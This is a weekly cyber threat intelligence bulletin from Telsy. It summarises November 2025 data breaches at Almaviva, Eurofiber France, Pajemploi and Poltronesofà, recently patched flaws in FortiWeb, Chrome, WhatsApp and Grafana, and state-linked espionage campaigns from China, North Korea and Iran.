Chinese and Russian APT activity tracked, multiple breach disclosures, ShadowV2 observed and malicious npm packages identified

Chinese front companies BIETA and CIII and steganography in APT operations

 View all
Threat Intelligence, News

New breaches and ransomware attacks, multiple vulnerabilities fixed, and the latest from the state-sponsored landscape 

Weekly Threats hor Telsy

Cybercrime: attacks on Almaviva, Eurofiber France, Pajemploi and Poltronesofà

A few days after the publication on an underground forum of a leak of approximately 2.3 TB containing data linked to Almaviva S.p.A. and several companies belonging to the Ferrovie dello Stato (FS) Group, the company — a leading Italian Information & Communication Technology provider and technological partner of FS Group — confirmed that in recent weeks it had identified and isolated a cyberattack affecting its corporate systems, resulting in the theft of some information. It also stated that it immediately activated security and containment procedures, ensuring continuity of critical services. On 13 November 2025, Eurofiber France detected an incident limited to the French division that involved the ticketing platform used by the company and its regional brands — Eurafibre, FullSave, Netiwan and Avelia — together with the ATE customer portal of the cloud division Eurofiber Cloud Infra France. The adversary exploited a vulnerability, leading to the exfiltration of data related to these platforms. Urssaf, the French public body responsible for collecting social security contributions, reported that the Pajemploi service — dedicated to parents employing domestic childcare workers (licensed childminders and babysitters) — suffered a data breach that may have exposed the personal information of roughly 1.2 million workers. Finally, the Italian company Poltronesofà — specialised in the production and distribution of sofas and armchairs — notified its customers (via Italian and French statements) that it suffered a ransomware attack on 27 October 2025. The company reported that unauthorised actors compromised Poltronesofà Group servers, causing the encryption of stored files and the unavailability of hosted virtual machines. Initial investigations indicate that customer identification and contact data — including name, surname, tax code, postal address, email and mobile number — may have been involved. No public claim of responsibility has emerged.

  

Vulnerabilities: 0-days and critical flaws patched

Fortinet’s PSIRT addressed two 0-day vulnerabilities in the FortiWeb firewall, tracked as CVE-2025-64446 and CVE-2025-58034. The first is a Relative Path Traversal that could allow an unauthenticated user to execute administrative commands on the system through specially crafted HTTP or HTTPS requests. The first reports of attacks exploiting this flaw date back to 6 October 2025. The second is an OS Command Injection that could allow an authenticated attacker to execute unauthorised code on the underlying system via crafted HTTP requests or CLI commands. The U.S. CISA agency has added both issues to its KEV catalog. Google fixed two Chrome vulnerabilities, CVE-2025-13223 and CVE-2025-13224, both classified as Type Confusion in V8. For CVE-2025-13223, the vendor acknowledged awareness of in-the-wild exploitation. According to the National Institute of Standards and Technology (NIST), the flaw may enable a remote adversary to potentially trigger heap corruption through a specially crafted HTML page. WhatsApp patched CVE-2025-55179 in the iOS, Mac and Business for iOS versions. The issue concerns incomplete validation of “rich response” messages, which could have allowed a user to induce another user’s application to process media content from an arbitrary URL. Grafana released versions 12.3, 12.2.1, 12.1.3 and 12.0.6 to address a critical vulnerability discovered in the System for Cross-domain Identity Management (SCIM) of Grafana Enterprise. Identified as CVE-2025-41115 (CVSS 10.0), the flaw is an Incorrect Privilege Assignment that may enable privilege escalation or user impersonation under certain configurations.

  

APT: activity from China, North Korea and the Middle East

The Chinese adversary PlushDaemon leveraged a previously unseen implant named EdgeStepper in adversary-in-the-middle attacks aimed at redirecting victims’ software-update traffic to attacker-controlled servers. Also China-related, U.S. AI startup Anthropic reported and subsequently disrupted a large-scale, mostly automated cyber-espionage operation conducted by a Chinese state-sponsored actor tracked as GTG-1002. The activity involved abusing Anthropic’s Claude Code platform to target 30 high-profile organisations, including major tech firms, financial institutions, chemical manufacturers and government agencies, successfully compromising only a small number of them. The UK’s MI5 issued an alert concerning attempts by China’s Ministry of State Security (MSS) to recruit individuals with access to sensitive information about the British state through two seemingly legitimate LinkedIn profiles used to approach MPs and political staff. Moving to North Korea, Lazarus Group’s Contagious Interview campaign is leveraging legitimate JSON storage services — such as JSON Keeper, JSONsilo and npoint[.]io — to host and subsequently distribute malware. In the Middle East, the Israel National Digital Agency (INDA) uncovered an ongoing and sophisticated espionage operation, dubbed SpearSpecter, by the Iranian APT Charming Kitten. The operation systematically targeted senior defence and government officials through personalised social engineering tactics, including invitations to prestigious conferences or the arrangement of important meetings. The activity also expanded to target family members, thereby broadening the attack surface and increasing pressure on primary victims. The TTPs include new modules of the TAMECAT backdoor, a multichannel C2 infrastructure leveraging Telegram and Discord, payload staging through WebDAV infrastructure and creative abuse of native Windows features. Also in the Middle East, new elements emerged regarding the TTPs of the espionage campaign conducted by Iranian actor Tortoiseshell (UNC1549) — tracked in mid-2024 — targeting the aerospace, aviation and defence sectors in the region. 

 

Weekly Threats Report is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.

The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.

Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with valuable information to anticipate attacks and understand their impact, while ensuring a reliable partner in the event of a cyber incident.

Discover more about our Cyber Threat Intelligence solution.